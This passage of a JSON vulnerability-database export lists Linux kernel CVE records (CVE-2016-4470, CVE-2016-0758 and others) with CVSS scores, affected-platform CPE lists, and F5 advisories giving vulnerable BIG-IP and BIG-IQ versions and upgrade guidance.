"AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4470"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.0", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:redhat:enterprise_mrg:2.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_for_real_time:7.0", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:oracle:linux:5.0", "cpe:/o:linux:linux_kernel:4.6.3", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-4470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4470", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_for_real_time:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "Integer overflow in lib/asn1_decoder.c in the Linux kernel before 4.6 allows local users to gain privileges via crafted ASN.1 data.\n<a href=\"http://cwe.mitre.org/data/definitions/190.html\">CWE-190: Integer Overflow or Wraparound</a>", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-27T10:59:00", "title": "CVE-2016-0758", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0758"], "modified": "2016-11-28T19:55:00", "cpe": ["cpe:/o:linux:linux_kernel:4.5.0", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2"], "id": "CVE-2016-0758", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0758", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:07", "description": "The InfiniBand (aka IB) stack in the Linux kernel before 4.5.3 incorrectly relies on the write system call, which allows local users to cause a denial of service (kernel memory write operation) or possibly have unspecified other impact via a uAPI interface.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-23T10:59:00", "title": "CVE-2016-4565", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4565"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/o:linux:linux_kernel:4.5.2"], "id": "CVE-2016-4565", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4565", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.5.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:03", "description": "The ecryptfs_privileged_open function in fs/ecryptfs/kthread.c in the Linux kernel before 4.6.3 allows local users to gain privileges or cause a denial of service (stack memory consumption) via vectors involving crafted mmap calls for /proc pathnames, leading to recursive pagefault handling.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-27T10:59:00", "title": "CVE-2016-1583", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1583"], "modified": "2018-12-06T22:29:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_live_patching:12.0", "cpe:/o:novell:suse_linux_enterprise_server:11.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:linux:linux_kernel:4.6.2", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:novell:suse_linux_enterprise_debuginfo:11.0", "cpe:/o:novell:suse_linux_enterprise_module_for_public_cloud:12", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/a:novell:suse_linux_enterprise_software_development_kit:11.0", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-1583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1583", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_module_for_public_cloud:12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:extra:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_debuginfo:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:a:novell:suse_linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_live_patching:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}], "android": [{"lastseen": "2020-06-22T14:42:10", "bulletinFamily": "software", "cvelist": ["CVE-2013-7446"], "description": "Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel before 4.3.3 allows local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-09-01T00:00:00", "id": "ANDROID:CVE-2013-7446", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2013-7446.html", "title": "CVE-2013-7446", "type": "android", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2020-06-22T14:42:07", "bulletinFamily": "software", "cvelist": ["CVE-2015-8816"], "description": "The hub_activate function in drivers/usb/core/hub.c in the Linux kernel before 4.3.5 does not properly maintain a hub-interface data structure, which allows physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-07-01T00:00:00", "id": "ANDROID:CVE-2015-8816", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2015-8816.html", "title": "CVE-2015-8816", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T14:42:10", "bulletinFamily": "software", "cvelist": ["CVE-2016-3134"], "description": "The netfilter subsystem in the Linux kernel through 4.5.2 does not validate certain offset fields, which allows local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-09-01T00:00:00", "id": "ANDROID:CVE-2016-3134", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-3134.html", "title": "CVE-2016-3134", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T14:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "description": "The key_reject_and_link function in security/keys/key.c in the Linux kernel through 4.6.3 does not ensure that a certain data structure is initialized, which allows local users to cause a denial of service (system crash) via vectors involving a crafted keyctl request2 command.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-09-01T00:00:00", "id": "ANDROID:CVE-2016-4470", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-4470.html", "title": "CVE-2016-4470", "type": "android", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-06-22T14:42:09", "bulletinFamily": "software", "cvelist": ["CVE-2016-0758"], "description": "Integer overflow in lib/asn1_decoder.c in the Linux kernel before 4.6 allows local users to gain privileges via crafted ASN.1 data.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-10-01T00:00:00", "id": "ANDROID:CVE-2016-0758", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-0758.html", "title": "CVE-2016-0758", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-04-30T18:21:12", "bulletinFamily": "software", "cvelist": ["CVE-2013-7446"], "description": "\nF5 Product Development has assigned ID 570025 (BIG-IP), ID 570141 (BIG-IQ), and ID 570142 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H20022580 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 13.0.0| Medium| Linux kernel \nBIG-IP AAM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0| Medium| Linux kernel \nBIG-IP AFM| 12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| 13.0.0| Medium| Linux kernel \nBIG-IP Analytics| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1| 13.0.0| Medium| Linux kernel \nBIG-IP APM| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 13.0.0| Medium| Linux kernel \nBIG-IP ASM| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 13.0.0| Medium| Linux kernel \nBIG-IP DNS| 12.0.0 - 12.1.2| 13.0.0| Medium| Linux kernel \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nBIG-IP Link Controller| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 13.0.0| Medium| Linux kernel \nBIG-IP PEM| 12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| 13.0.0| Medium| Linux kernel \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Medium| Linux kernel \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ ADC| 4.5.0| None| Medium| Linux kernel \nBIG-IQ Centralized Management| 4.6.0| None| Medium| Linux kernel \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| Linux kernel \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-05-05T09:21:00", "published": "2016-01-29T02:18:00", "id": "F5:K20022580", "href": "https://support.f5.com/csp/article/K20022580", "title": "Linux kernel vulnerability CVE-2013-7446", "type": "f5", "cvss": {"score": 5.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:25", "bulletinFamily": "software", "cvelist": ["CVE-2013-7446"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-01-28T00:00:00", "published": "2016-01-28T00:00:00", "id": "SOL20022580", "href": "http://support.f5.com/kb/en-us/solutions/public/k/20/sol20022580.html", "type": "f5", "title": "SOL20022580 - Linux kernel vulnerability CVE-2013-7446", "cvss": {"score": 5.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2019-05-09T00:21:17", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "description": "\nF5 Product Development has assigned ID 623119 (BIG-IP), ID 623155 (BIG-IQ), and ID 623156 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H624225 on the **Diagnostics** > **Identified** > **Medium** screen. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WOM | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 | Not vulnerable \n\n \n\n| None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.2 | 2.1.0 - 2.3.0 | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "edition": 1, "modified": "2017-10-31T21:08:00", "published": "2016-10-23T07:33:00", "id": "F5:K55672042", "href": "https://support.f5.com/csp/article/K55672042", "title": "Linux kernel vulnerability CVE-2016-4470", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-23T05:25:14", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to SOL21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems.\n\nMitigation\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/55/sol55672042.html", "id": "SOL55672042", "type": "f5", "title": "SOL55672042 - Linux kernel vulnerability CVE-2016-4470", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-09-29T13:55:51", "bulletinFamily": "software", "cvelist": ["CVE-2016-4565"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not 